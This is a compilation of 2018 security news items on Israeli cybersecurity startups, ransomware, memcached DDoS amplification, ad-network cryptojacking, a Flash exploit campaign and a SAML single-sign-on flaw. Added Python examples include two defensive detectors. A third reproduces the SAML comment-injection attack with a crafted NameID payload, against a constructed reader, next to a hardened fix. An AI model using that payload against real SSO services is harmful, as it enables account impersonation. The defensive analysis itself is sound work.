When talented youth join the NSA or FBI or GCHQ or any other national intelligence agency, they are expected to do so for life, not just for three years. No other nation has this constant stream of highly trained, audacious and entrepreneurial young people entering the job market every year. What else should the more entrepreneurial alumni do but start their own firms using the skills they have acquired; and what else should others do but work in the R&D departments of these firms?

IDF's cybersecurity training

SecurityWeek spoke to several founders of Israeli cybersecurity firms. All of them served in technology units, and most in Unit 8200. Other military units have their own technology sections, and these also lead to spin-offs. Examples include Yuval Diskin, former director of Shin Bet, who started the cyber-tech company Diskin Advanced Technologies LTD; and Haim Tomer, formerly head of the Mossad's Intelligence Division, who is now a cybersecurity consultant. Despite such examples, however, it is the alumni of 8200 that dominate the new start-ups.

Understanding why Israel produces so many cybersecurity firms starts with understanding the conveyor belt of talent that 8200 produces. Lior Div (CEO), Yossi Nar (CVO), and Yonatan Striem-Amit (CTO) are the three ex-8200 co-founders of Cybereason. "It starts," explains Div, "with how people are selected to get into 8200. The Unit interviews all new draftees, using a series of tests looking at background, math proficiency, programming capabilities and pure intelligence. 8200 gets 'first pick'."

Just two military units get the lion's share of the best of the best: pilots for the air force, and 8200 for cyber warriors. Draftees serve anything from three to five years. During this period, special talent is fast-tracked. "By the time I was 19, I already had 10 developers reporting to me," said Div.

But it is fast-tracking in a unique environment. In commercial terms, the 'projects' are now well-funded and manned. "You are taught one thing in particular," he continued: "there is no such thing as impossible -- there is no notion of what you can and cannot do. You are given a problem, you work like crazy and eventually you solve the problem. So by the time you are released, around age 22 or 23, you are trained to solve cybersecurity problems."

This training is unique. Having chosen its new intake, said Div, "the military undertakes intensive training. After six months, 'trainees' have learned what a traditional university would take four years to teach -- and they have learned the practice of their subject and not just the underlying theory. By the time they leave, they are trained and confident cybersecurity warriors with new ideas."

This is confirmed by Boris Vaynburg, co-founder and CEO of Solebit. He and his two co-founders, along with 95% of his R&D staff, are all IDF technology unit alumni. He points out that in order to stay one step ahead of Israel's adversaries, Unit 8200 must take advantage of all known and unknown vulnerabilities in order to get into target networks. In essence, 8200 members get constant on-the-job red team training; and by the time draftees leave the military, they have a thorough understanding -- through use -- of the techniques used by hackers.

Eddy Brobitsky, CEO and co-founder of Minerva Labs, did not serve in Unit 8200. "Neither I nor my two co-founders served with 8200," he said. "We served in the unit that builds defensive solutions for the IDF. IDF doesn't want to rely on off-the-shelf products only -- it's important to develop your own products, so nobody will know how they work. We were focused on developing scalable products for cybersecurity and IT." It's worth noting that the IDF is, in these terms, the largest company in Israel. Building security defenses suitable for the entire IDF and Israeli government is equivalent to building a security product that will scale to the largest commercial organizations.

But it's not just the practical expertise of service that benefits budding entrepreneurs -- it is the whole culture. We've seen that 'nothing is impossible' and chutzpah is encouraged; but there is also a completely different 'product' development culture. "Inside the IDF," explained Brobitsky, "the motivation for developing new security is to save human life. It's not about financial profit. All I had to do was show that a vulnerability existed and that someone could be hurt if there was a compromise, and I would get the budget to execute the project and build a defense."

It's not the same in the commercial world. "Later, when I worked in a bank which was driven by money," he continued, "I needed to show that any investment in cybersecurity would not hurt income but actually increase income. It's a very different approach. For example, if you fail in the IDF, you don't get fired -- you're still in the army. The army is always encouraging you to try and not accept defeat in any project; so it encourages innovation." While serving in the IDF, Brobitsky was involved in the development of between 20 and 30 different cybersecurity solutions for the entire IDF and government.

"So the environment is to try and try again until you succeed. In the real world, if you fail you will sometimes lose your job; and if you've already lost one job through not succeeding, you're always a bit afraid to try a different approach to things wherever you go."

A second difference from the outside world is the extent of 'networking' within Israel's technology world. Although there are different technology units with different priorities, there is constant intercommunication between them. Everybody knows everybody, commented Amit Rahav, VP of business development at Secret Double Octopus, "with veterans of the Israeli intelligence units seeking to hire these young guys right away, appreciating the pre-selection, training and experience of the units they themselves came out of. This is to some extent similar to what happens at Ivy League MBA programs in the US."

From new idea to new company

From here there is a well-trod path. Turning what has been learned into a new company requires funding. Early-stage venture capital is available in Israel for good ideas. Not all ideas are good; but Israeli investors have become savvy in technology. Nobody wanted to say that there is smart money and dumb money, but it was a common acknowledgment that Israeli money is smart. Good ideas get funded and dumb ideas never get off the ground.

"Israeli venture capital is available, but it is hard to get and getting harder," explained Solebit's Vaynburg. "Any new idea has to be disruptive and unique with a strong team behind it. It's easier to get VC outside of Israel," he continued, "because the Israeli VC firms have become very cybersecurity savvy, and there are so many approaches for what is already an overcrowded market."

At the same time, of course, the cost of getting a product presentation team together and flown to the U.S. to present to a U.S. venture capital firm is exorbitant for what is, at this stage, likely to be not much more than proof of concept on a new idea. Seed funding tends to come from Israel itself.

What this generally means is that when a new cybersecurity firm is ready to expand outside of Israel, it is already a fair bet. That expansion usually means a move to the U.S. rather than the UK or Europe. For this there are three motivations -- all of which SecurityWeek has already heard in different contexts. Firstly, there is far more venture capital available in the US than elsewhere. It's just beginning in Europe: there's some in Berlin, but little in London.

Secondly, despite the European Union, there are at least six different cultures and different languages to understand within the member nations, as opposed to, basically, just one American culture and language. Thirdly, and perhaps most importantly, new technology early-adopters are more prevalent in America -- and especially on the West Coast -- than anywhere else.

The real decision is not America or Europe, but West Coast or East Coast. While the majority might be attracted to the entrepreneurial attitude of the West Coast, others are attracted by the big financial customers of the East Coast. Boston-based CyberArk is one. "We figured the biggest adoption for security would first come from financial services firms, and that very much lent itself to the East Coast," commented CEO Udi Mokady, another 8200 alumnus.

The path from concept to company is illustrated by Solebit itself. "Solebit was established 3 years ago," said Vaynburg. "R&D is based in Israel. Our headquarters, however, is currently relocating to the Bay Area. We raised our seed funding from an Israeli venture capital firm [$2 million from Glilot Capital Partners in 2015], and Round A funding from a U.S. venture capital firm." The Round A funding is so new that, although it has closed, it is yet to be announced.

Lessons from the Israeli cybersecurity model

The sad truth is that the IDF situation in Israel is unique and could not be copied anywhere else in the world. It provides a constant source of technological competence trained to be audacious, persistent and positive. Other SIGINT organizations around the world do not release their staff onto the job market, preferring to keep them. Retired NSA, CIA and FBI staff tend to join the boards of existing large corporations; they do not tend to start new companies. In the UK, retired GCHQ and Ministry of Defence (MoD) officers might become private consultants, offering experience and expertise -- but rarely new ideas.

One idea alone could translate to other countries. The IDF, the largest company in Israel, funds the university fees for promising students, requiring only that they work for the IDF for a period after graduation. Large western organizations could do similar, finding and nurturing young talent. The idea of serious cybersecurity talent emerging with a sought-after degree and no student debt should be alluring to all sides.

Samsung Smartphones Get Encrypted Communications
28.7.2018 securityweek Krypto

KoolSpan this week announced a partnership with Samsung to implement secure communications on Samsung smartphones.

KoolSpan, a provider of encrypted secure voice and messaging solutions for mobiles, is already offering secure communications to enterprises. With support for mainstream phones, which are normally used within organizations, the solutions bring end-to-end encryption to all internal calls and texts within a company.

The end result of the partnership between KoolSpan and Samsung is TrustCall Native for Samsung, which provides native dialer integration on Samsung devices and which is being demonstrated at the Mobile World Congress in Barcelona.

The solution is aimed at tackling the rise in attacks on mobile communications, which normally consist of calls and messages being intercepted through the exploitation of vulnerabilities in mobile internetworking protocols.

Last year, the U.S. Department of Homeland Security (DHS) issued a report to underline some of the issues plaguing mobile communications, suggesting that both deliberate and accidental threats to mobile security continue to exist.

TrustCall Native for Samsung is focused on addressing such concerns by offering more secure communications on Samsung smartphones. To ensure ease-of-use, it integrates with Samsung native functionality for phone, messaging and contacts and applies encryption automatically.

KoolSpan’s solution is managed, deployed and configured across all smartphones within an organization by the IT department and is integrated with the phone’s native dialer and messenger. TrustCall Native Secure Communications for Samsung is available for customers with a Samsung Enterprise Alliance Program (SEAP) account and a subscription to KNOX Configure.

“We’re excited to partner with KoolSpan, which enables us to implement secure communications on Samsung smartphones. TrustCall Native, one of KoolSpan’s flagship products, is the best example of the universal understanding that security is only as good as it is easy to use,” Mike Kazmierczak, Samsung B2B Business Development Manager, Mobile B2B Team, EMEA, said.

Thanatos Ransomware Makes Data Recovery Impossible
28.7.2018 securityweek

A newly discovered ransomware family is generating a different encryption key for each of the encrypted files but saves none of them, thus making data recovery impossible.

Dubbed Thanatos, the malware was discovered by MalwareHunterTeam and already analyzed by several other security researchers.

When encrypting files on a computer, the malware appends the .THANATOS extension to them. After completing the encryption, the malware connects to a specific URL to report back, thus allowing attackers to keep track of the number of infected victims.

The malware also generates an autorun key to open the ransom note every time the user logs in. In that note, the victim is instructed to send $200 to a listed crypto-coin address. Victims are also instructed to contact the attackers via email to receive a decryption program.

Thanatos’ operators allow victims to pay the ransom in Bitcoin, Ethereum, or Bitcoin Cash, thus becoming the first ransomware to accept Bitcoin Cash payments, Bleeping Computer’s Lawrence Abrams points out.

The issue with the new ransomware is that, because it doesn’t save the encryption keys, files cannot be decrypted normally. However, victims don’t know that and might end up paying the ransom in the hope that they can recover their files.

The good news regarding Thanatos, however, is that there might be a way to brute-force the encryption keys, or at least that is what security researcher Francesco Muroni suggests. However, this process would take a long time and would require the encrypted file to be of a common type with a known magic header, so that a candidate key can be recognized as correct.

Because of the botched encryption process, it is recommended to avoid paying the ransom if infected with Thanatos. Of course, this applies to every ransomware infection. It is also recommended to always keep applications up to date, and to use a security program capable of preventing this type of malware from compromising your systems.

Memcached Abused for DDoS Amplification Attacks
28.7.2018 securityweek

Malicious actors have started abusing the memcached protocol to launch distributed denial-of-service (DDoS) attacks, Cloudflare and Arbor Networks warned on Tuesday.

Memcached is a free and open source distributed memory caching system designed to work with a large number of open connections. Clients can communicate with memcached servers via TCP or UDP on port 11211.

Cloudflare noticed in recent days that memcached has been abused for DDoS amplification attacks, and so have Arbor Networks and Chinese security firm Qihoo 360. Cloudflare has dubbed this type of attack Memcrashed.

Attackers are apparently abusing unprotected memcached servers that have UDP enabled. Similar to other amplification methods, the attacker sends a request to the targeted server on port 11211 using a spoofed IP address that matches the IP of the victim. The request sent to the server is just a few bytes, but the response can be tens of thousands of times bigger, resulting in a significant attack.

The largest memcached DDoS attack observed by Cloudflare peaked at 260 Gbps, but Arbor Networks reported seeing attacks that peaked at 500 Gbps and even more.

“I was surprised to learn that memcached does UDP, but there you go!” said Cloudflare’s Marek Majkowski. “The protocol specification shows that it's one of the best protocols to use for amplification ever! There are absolutely zero checks, and the data WILL be delivered to the client, with blazing speed! Furthermore, the request can be tiny and the response huge (up to 1MB).”

Arbor Networks noted that the type of queries used in these attacks can also be directed at TCP port 11211, but since TCP queries cannot be reliably spoofed, this protocol is less likely to be abused. The company pointed out that Chinese researchers warned about the possibility of attacks abusing memcached in November.

In the attacks seen by Cloudflare, attackers abused servers from all around the world, but mostly from North America and Europe. A majority of the servers are hosted by OVH, DigitalOcean and Sakura.

The attacks monitored by the content delivery network (CDN) came from roughly 5,700 unique IPs associated with memcached servers, but experts expect to see much larger attacks in the future considering that Shodan shows nearly 88,000 open servers. A majority of the exposed systems are in the United States, followed by China and France.

Location of exposed memcached servers

“Arbor’s current assessment is that, as with most other DDoS attack methodologies, memcached DDoS attacks were initially – and for a very brief interval – employed manually by skilled attackers; they have subsequently been weaponized and made available to attackers of all skill levels via so-called ‘booter/stresser’ DDoS-for-hire botnets,” Arbor Networks researchers said in a blog post. “The rapid increase in the prevalence of these attacks indicates that this relatively new attack vector was weaponized and broadly leveraged by attackers within a relatively short interval.”

Cloudflare recommends disabling UDP support unless it’s needed, and advises system administrators to ensure that their memcached servers are not reachable from the Internet. Internet service providers (ISPs) can also contribute to mitigating these and other types of amplification attacks by fixing vulnerable protocols and preventing IP spoofing.
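The traffic pattern described above (a tiny spoofed request to UDP/11211, a huge reply to the victim, TCP left aside because it cannot be reliably spoofed) can be picked out of flow records. The following detector is an added example, not code from Cloudflare or Arbor Networks; the flow lines, the record format and the thresholds are constructed assumptions.

```python
"""Flag likely memcached UDP amplification in NetFlow-style records.

Added example; this is not code from Cloudflare or Arbor Networks.
The flow lines are constructed and the thresholds are assumptions.

Record format (constructed), one flow per line:
    proto src_ip src_port dst_ip dst_port packets bytes
"""
from collections import defaultdict

MEMCACHED_PORT = 11211

# Constructed sample: one victim (198.51.100.7) whose address is spoofed in
# tiny requests to four exposed reflectors, which answer with huge responses.
SAMPLE_FLOWS = """\
# spoofed requests: the victim's address appears as the source
udp 198.51.100.7 54321 203.0.113.10 11211 1 15
udp 198.51.100.7 54321 203.0.113.11 11211 1 15
udp 198.51.100.7 54321 203.0.113.12 11211 1 15
udp 198.51.100.7 54321 203.0.113.13 11211 1 15
# reflected responses, each far larger than the request that triggered it
udp 203.0.113.10 11211 198.51.100.7 54321 3 1500000
udp 203.0.113.11 11211 198.51.100.7 54321 2 1000000
udp 203.0.113.12 11211 198.51.100.7 54321 2 980000
udp 203.0.113.13 11211 198.51.100.7 54321 1 500000
# benign: a small local UDP reply, and a TCP session (TCP cannot be reliably spoofed)
udp 192.0.2.50 11211 192.0.2.51 40000 1 120
tcp 203.0.113.10 11211 198.51.100.9 50000 10 4000
"""


def parse_flows(text):
    """Parse the whitespace-separated flow records, skipping blanks and comments."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        proto, src, sport, dst, dport, pkts, nbytes = line.split()
        flows.append({
            "proto": proto.lower(), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport),
            "packets": int(pkts), "bytes": int(nbytes),
        })
    return flows


def find_amplification_victims(flows, min_reflectors=3, min_bytes=1_000_000):
    """Return {victim_ip: stats} for hosts receiving amplified memcached UDP replies.

    A host is flagged when at least `min_reflectors` distinct servers send it
    UDP traffic from source port 11211 totalling at least `min_bytes`.
    The amplification factor is response bytes divided by the bytes of the
    (spoofed) requests seen from the same address, when any were captured.
    """
    responses = defaultdict(lambda: {"reflectors": set(), "bytes": 0})
    request_bytes = defaultdict(int)
    for f in flows:
        if f["proto"] != "udp":            # only UDP can be spoofed and reflected
            continue
        if f["sport"] == MEMCACHED_PORT:   # server -> "client": a reflected response
            responses[f["dst"]]["reflectors"].add(f["src"])
            responses[f["dst"]]["bytes"] += f["bytes"]
        elif f["dport"] == MEMCACHED_PORT:  # "client" -> server: the triggering request
            request_bytes[f["src"]] += f["bytes"]

    victims = {}
    for ip, stats in responses.items():
        if len(stats["reflectors"]) >= min_reflectors and stats["bytes"] >= min_bytes:
            req = request_bytes.get(ip, 0)
            victims[ip] = {
                "reflectors": len(stats["reflectors"]),
                "response_bytes": stats["bytes"],
                "amplification": stats["bytes"] / req if req else None,
            }
    return victims


if __name__ == "__main__":
    for ip, stats in find_amplification_victims(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{ip}: {stats['reflectors']} reflectors, "
              f"{stats['response_bytes']} bytes, "
              f"amplification x{stats['amplification']:.0f}")
```

On a real collector the same logic runs per time bucket; the victim here is flagged with four reflectors and an amplification factor of roughly 66,000 from the constructed sample.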

Ad Network Performs In-Browser Cryptojacking
28.7.2018 securityweek CoinMine

An ad network provider is performing in-browser Coinhive cryptojacking on websites that use its service, 360 Netlab security researchers warn.

The practice has been ongoing since December 2017, several months after the ad network provider, a company called PopAds Publisher, started using domain generation algorithm (DGA) technology to bypass ad blockers, claiming it would allow customers to “monetize traffic that wasn’t monetized before.”

In mid-2017, the provider started to generate seemingly random domains to ensure that ads could reach end users. By the end of the year, however, these domains, which 360 Netlab refers to as DGA.popad, started participating in cryptojacking activities, all without the end users’ consent.

Given that many people use ad blockers to prevent sites from displaying ads to them, ad networks often attempt to bypass blockers, and this provider decided to use DGA domains to host its advertisements. With these domains changing daily, it becomes difficult to block the ads, the researchers point out.

What’s more, the ad network provider recently started using the DGA.popad domains to perform cryptojacking. These domains, the researchers discovered, have a strong connection with Coinhive family domains in DNS traffic and serve the coinhive.min.js web miner.

Some of the DGA.popad domains have a high ranking, with one of them found in the top 2000 sites on Alexa and several others in the top 3000 list.

Once a user accesses such a site, their computer’s CPU is driven to full utilization. According to 360 Netlab, the favicon.ico on the DGA.popad sites was found to run as a web miner. Most of the sites that redirect users to DGA.popad domains provide adult content and download services.

Because the impacted sites contain advertisements from this ad network, the cryptojacking activities are performed regardless of whether the user has an ad blocker installed or not.

Normally, users would be sent to a standard domain (serve.popads.net) hosted by the provider. If an ad blocker is used, the standard domain is blocked, and the visitor is sent to one of the DGA.popad domains. Regardless of the delivery mechanism, both the ad and the cryptojacking script are served.

“We are not able to make a detailed assessment. This is because only part of the traffic passing through DGA.popad and serve.popads.net will have a web miner inserted, but we are not sure which part will be selected, for now,” the researchers note.
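The delivery chain described above (a query for the ad network's standard domain or for a freshly generated DGA domain, followed shortly by a query for a Coinhive-family domain from the same client) is something a defender can correlate in DNS logs. The following script is an added example and not code from 360 Netlab; the miner domain list, the DGA heuristic thresholds, the 30-second window and the log lines are all constructed assumptions.

```python
"""Correlate DNS queries for ad-network or DGA-looking domains with a
follow-up query for a Coinhive-family domain from the same client.

Added example; not code from 360 Netlab. The miner domain list, the DGA
heuristic, the window and the log lines are constructed assumptions.

Log format (constructed): "<unix_ts> <client_ip> <queried_name>"
"""
import math
from collections import defaultdict

COINHIVE_DOMAINS = {"coinhive.com", "coin-hive.com"}   # assumed miner-family list
AD_NETWORK_DOMAINS = {"serve.popads.net"}              # the standard domain the article names
WINDOW_SECONDS = 30                                    # assumed correlation window

SAMPLE_DNS_LOG = """\
1519770001 10.0.0.5 serve.popads.net
1519770002 10.0.0.5 coinhive.com
1519770010 10.0.0.8 xk3q9vz1ab7tqm.com
1519770012 10.0.0.8 coinhive.com
1519770100 10.0.0.9 www.example.com
1519770101 10.0.0.9 coinhive.com
1519770200 10.0.0.7 stackoverflow.com
1519770500 10.0.0.7 coin-hive.com
"""


def shannon_entropy(text):
    """Bits of entropy per character of `text`."""
    n = len(text)
    return -sum((text.count(c) / n) * math.log2(text.count(c) / n) for c in set(text))


def looks_like_dga(qname, min_len=10, min_entropy=3.2):
    """Crude heuristic: a long, high-entropy leftmost label that mixes letters and digits."""
    label = qname.split(".")[0]
    return (len(label) >= min_len
            and any(c.isdigit() for c in label)
            and any(c.isalpha() for c in label)
            and shannon_entropy(label) >= min_entropy)


def is_precursor(qname):
    """An ad-network or DGA-looking query that may precede the miner being served."""
    return qname in AD_NETWORK_DOMAINS or looks_like_dga(qname)


def is_miner_domain(qname):
    return qname in COINHIVE_DOMAINS or any(qname.endswith("." + d) for d in COINHIVE_DOMAINS)


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, client, qname = line.split()
        records.append((int(ts), client, qname.lower().rstrip(".")))
    return sorted(records)


def find_cryptojacking_chains(records, window=WINDOW_SECONDS):
    """Return one finding per miner-domain query that follows a precursor
    query from the same client within `window` seconds."""
    recent = defaultdict(list)   # client -> [(ts, precursor qname), ...]
    findings = []
    for ts, client, qname in records:
        if is_precursor(qname):
            recent[client].append((ts, qname))
        elif is_miner_domain(qname):
            for p_ts, p_name in recent[client]:
                if 0 <= ts - p_ts <= window:
                    findings.append({"client": client, "precursor": p_name,
                                     "miner": qname, "delay_s": ts - p_ts})
                    break
    return findings


if __name__ == "__main__":
    for hit in find_cryptojacking_chains(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f"{hit['client']}: {hit['precursor']} -> {hit['miner']} after {hit['delay_s']}s")
```

A miner query with no precursor (10.0.0.9 in the sample) is deliberately not reported, since the script only models the ad-delivered chain the researchers describe; a broader rule would alert on any Coinhive-family query.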

Trump Yet to Order Spies to Retaliate Against Russia: NSA Chief
28.7.2018 securityweek BigBrothers

President Donald Trump has not yet ordered his spy chiefs to retaliate against Russian interference in US elections, the head of the National Security Agency told lawmakers Tuesday.

"We have not opted to engage in some of the same behaviors we are seeing," said Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, the military body charged with online combat.

Asked in a Senate Intelligence Committee hearing if he had received orders from Trump to fight back against Moscow's meddling, Rogers said: "No, I have not."

Rogers denied claims that the agency is doing nothing to push back against Russian hacking, theft of US cyber secrets and other activities.

However, he acknowledged: "They have not paid a price that is sufficient to change their behavior."

Rogers echoed the comments he and five other US intelligence chiefs made two weeks ago at the House Intelligence Committee, where all said they had not been ordered by Trump to counter the Russians.

The US has accused Russia of actively interfering in the 2016 presidential election, stealing Democratic party communications and pushing out disinformation through social media.

It also accuses Moscow of stealing hacking secrets of the US intelligence community.

Rogers said an order from Trump is needed before the US intelligence community and military can undertake offensive online operations against the Russians.

"What I see on the Cyber Command side leads me to believe that if we don't change the dynamic here, that this is going to continue, and 2016 won't be viewed as isolated," he said.

But he said that at a lower level, the NSA and Cyber Command could take some unspecified actions to rebuff attackers.

Asked about the exchange in Congress, White House spokeswoman Sarah Sanders suggested the president does not need to act.

"Nobody is denying him the authority," she said of Rogers.

A vulnerability in Facebook exposed email and details of page administrator
28.7.2018 securityaffairs

The security researcher Mohamed Baset discovered a vulnerability in Facebook that exposed email and other details of a page administrator.
Facebook has recently addressed an information disclosure vulnerability discovered by the security researcher Mohamed Baset that exposed page administrator details.

According to Baset, the flaw is a “logical error” that he discovered after receiving an invitation to like a Facebook page on which he had liked a post.


“One day I liked one of the posts of a specific page but I didn’t like or follow the page itself. After a few days I got an email notification from Facebook regarding an invitation to like the page one of whose posts I had already liked. I was amazed by the feature, but I realized that this is a feature to target non-fans, and I was wondering what could go wrong since this is a new feature?” states the blog post published by the expert.

“From the investigations that I’m doing sometimes in the office of the fraud and phishing emails, I’m always and blindly showing the “Original” of the message (that can be achieved by clicking on the little drop-down menu arrow beside the message reply button).”

The researcher analyzed the source code of the email sent by the social network and discovered that it includes the name of the page administrator and other information.


The researcher reported the issue to Facebook that acknowledged it and decided to award the expert $2,500 as part of its bug bounty program.

Facebook announced that it has paid out more than $880,000 for 400 vulnerability reports submitted by hackers.

Many of you may consider that the issue is not so serious, but this isn’t true, because under certain circumstances the data exposure could represent a threat to users’ privacy.

In the case of business or community pages, revealing the identities of the administrators could get them targeted by messages and comments.

“For many individual Facebook pages, the administrator and the page will share an identity, so putting the admin’s name in the page’s email isn’t really giving away much. But for business or community pages, which might have a number of co-administrators, you wouldn’t expect Facebook to reveal anything more than the name of the page itself, at least not without asking.” reads the blog post published by Sophos. “If nothing else, this protects individual employees from getting bombarded with comments and questions – whether they’re praises or rants – in place of the account itself.”

Recently patched CVE-2018-4878 Adobe Flash Player flaw now exploited by cybercriminals
28.7.2018 securityaffairs

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.
Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was used by North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability is being exploited by other threat actors in the wild, as confirmed by Morphisec. The company spotted the campaign on February 22; the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that used CVE-2018-4878 in a malspam campaign. The researchers also highlight that, unlike the original exploit, this one did not have a 64-bit version.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz.

The URLs included in the emails were generated with Google’s URL shortening service, which allowed the researchers to determine how many victims clicked them. According to Morphisec, each of the different links used in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created.

Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

CVE-2018-4878 malspam

If the user enables editing mode, CVE-2018-4878 is exploited and the Windows command prompt is launched. The cmd[.]exe process is then injected with malicious shellcode that connects to the attacker’s domain.

“On February 22, 2018, Morphisec Labs spotted several malicious word documents exploiting the latest Flash vulnerability CVE-2018-4878 in the wild in a massive malspam campaign.” states the analysis published by Morphisec.

“After downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a cmd[.]exe which is later remotely injected with a malicious shellcode that connects back to the malicious domain.”

The shellcode then downloads a DLL from the same domain, which is executed through the Microsoft Register Server utility (regsvr32) to bypass application whitelisting solutions.

According to the experts, only a limited number of security solutions flagged the bait documents as malicious.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible. With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.” concluded Morphisec.

Widespread Vulnerability Found in Single-Sign-On Products
27.7.2018 securityweek

A behavioral quirk in SAML libraries has left many single-sign-on (SSO) implementations vulnerable to abuse. It allows an attacker that has gained any authenticated access to trick the system into granting further access as a different user without knowledge of that user's password.

This could be used by an attacker who has compromised a low level limited access account to acquire access to third-party cloud services -- or it could be used by a malicious insider seeking access to reserved network areas (such as the payroll databases, or HR records).

The vulnerability was discovered by the research team of Duo Security, itself an SSO provider; and is described in a blog posted today. It affects many of the leading SSO providers, and probably affects the majority of proprietary company SSO developments.

Duo has confirmed the flaw in OneLogin - python-saml (CVE-2017-11427); OneLogin - ruby-saml (CVE-2017-11428); Clever - saml2-js (CVE-2017-11429); OmniAuth-SAML (CVE-2017-11430); Shibboleth (CVE-2018-0489); and Duo Network Gateway (CVE-2018-7340).

Security Assertion Markup Language (SAML) is the underlying protocol used by most SSO implementations. It is what allows authentication to be passed between a company's identity store and, for example, a third-party service. Typically, a user will log onto the identity store. This contains the credentials that will allow the same user to access other services.

SAML is used to pass authentication, via the browser, from the identity provider to the third-party service, granting access. The flaw lies in how authentication is encoded by SAML in the provider's 'response'.

The SAML authentication response contains two primary elements: the assertion and the signature. The assertion element says this NameID is authenticated. The signature element is designed to prevent the authenticated user NameID being changed at any point between the identity provider and the service being accessed. "If the attacker can modify the 'NameID' without invalidating the signature, that would be bad," suggest the Duo researchers; and then proceed to explain how it can be done.

"One of the causes of this vulnerability is a subtle and arguably unexpected behavior of XML libraries like Python’s 'lxml' or Ruby’s 'REXML'," write the blog's authors. Comments can be included in the signature, but the canonicalization process of the SAML libraries tend to drop all text after the first text node to isolate the NameID.

"So," explain the researchers, "as an attacker with access to the account 'user@user.com.evil.com', I can modify *my own* SAML assertions to change the NameID to 'user@user.com' when processed by the SP." The seven characters are <!----> inserted before .evil.com. This causes the canonicalization process to drop '.evil.com', leaving the authenticated account as 'user@user.com'.
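The truncation is easy to reproduce with Python’s standard library alone. The following is an added example, not Duo’s code and not the code of any affected library: it builds a constructed, heavily reduced assertion, uses an HMAC over the comment-free canonical form as a stand-in for the IdP’s XML-DSig signature (real SAML signatures also cover exclusive C14N without comments, which is why the comment never invalidates them), reads the NameID the way the affected libraries do (comments kept as nodes, `.text` returning only the first text node), then shows an “all text nodes” reading and a hardened reader that verifies first and rejects a NameID containing any child node. The function names (build_assertion, idp_sign, name_id_hardened and so on), the key and the assertion contents are assumptions made for the demonstration.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
IDP_KEY = b"demo-idp-key"  # constructed; real SAML uses XML-DSig, not an HMAC


def build_assertion(name_id: str) -> str:
    """Constructed, heavily reduced SAML assertion carrying only a NameID."""
    return (
        f'<saml:Assertion xmlns:saml="{SAML_NS}" ID="_demo" Version="2.0">'
        f"<saml:Subject><saml:NameID>{name_id}</saml:NameID></saml:Subject>"
        "</saml:Assertion>"
    )


def idp_sign(assertion_xml: str) -> str:
    """Stand-in for the IdP signature: HMAC over C14N *without comments*.
    Because comments are not part of the canonical form, inserting one
    anywhere leaves the signature value unchanged."""
    canonical = ET.canonicalize(assertion_xml, with_comments=False)
    return hmac.new(IDP_KEY, canonical.encode(), hashlib.sha256).hexdigest()


def sp_verify(assertion_xml: str, signature: str) -> bool:
    return hmac.compare_digest(idp_sign(assertion_xml), signature)


def _parse_keeping_comments(assertion_xml: str):
    # lxml and REXML keep comments as tree nodes; ElementTree does so on request.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(assertion_xml, parser=parser)


def _name_id_element(assertion_xml: str):
    return _parse_keeping_comments(assertion_xml).find(f".//{{{SAML_NS}}}NameID")


def name_id_vulnerable(assertion_xml: str) -> str:
    """How the affected libraries read NameID: `.text` is only the first text
    node, so everything after an embedded comment is silently dropped."""
    return _name_id_element(assertion_xml).text


def name_id_all_text_nodes(assertion_xml: str) -> str:
    """Concatenate every text node under NameID (the element text plus the
    tail of each child), which is what the comment-free canonical form, and
    therefore the signature, actually covered."""
    el = _name_id_element(assertion_xml)
    return (el.text or "") + "".join(child.tail or "" for child in el)


def name_id_hardened(assertion_xml: str, signature: str) -> str:
    """Verify first, then accept NameID only if it is a single text node."""
    if not sp_verify(assertion_xml, signature):
        raise ValueError("bad signature")
    el = _name_id_element(assertion_xml)
    if el is None or len(el) != 0:  # a comment or element child is present
        raise ValueError("NameID must be a single text node")
    return el.text or ""


def hardened_accepts(assertion_xml: str, signature: str) -> bool:
    try:
        name_id_hardened(assertion_xml, signature)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    good = build_assertion("user@user.com.evil.com")
    sig = idp_sign(good)
    # The attacker owns user@user.com.evil.com and edits their own assertion.
    evil = good.replace("user@user.com.evil.com", "user@user.com<!---->.evil.com")
    print("signature still valid:", sp_verify(evil, sig))
    print("vulnerable SP sees   :", name_id_vulnerable(evil))
    print("all text nodes       :", name_id_all_text_nodes(evil))
    print("hardened SP accepts  :", hardened_accepts(evil, sig))
```

Running the block prints that the tampered assertion still verifies, that the vulnerable reader returns user@user.com, that the text-node concatenation returns the real account, and that the hardened reader refuses it. For a real service provider the fix is to upgrade the SAML library, or to take the NameID from the same canonical form the signature covered rather than from a DOM `.text` accessor.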

Not all SSO implementations are vulnerable to this glitch; but Duo has demonstrated that many are. All that is required from the attacker is a genuine account that he can 'modify' to his attack target, plus the relatively minor technical savvy to intercept and edit the SAML authentication as it passes through the browser.

"Remediation of this issue," notes the report, "somewhat depends on what relationship you have with SAML." It gets a bit complicated. "Duo has released updates for the Duo Network Gateway in version 1.2.10. If you use the DNG as a SAML Service Provider and are not at version 1.2.10 or higher (at the time of writing this, 1.2.10 is the latest version), we recommend upgrading."

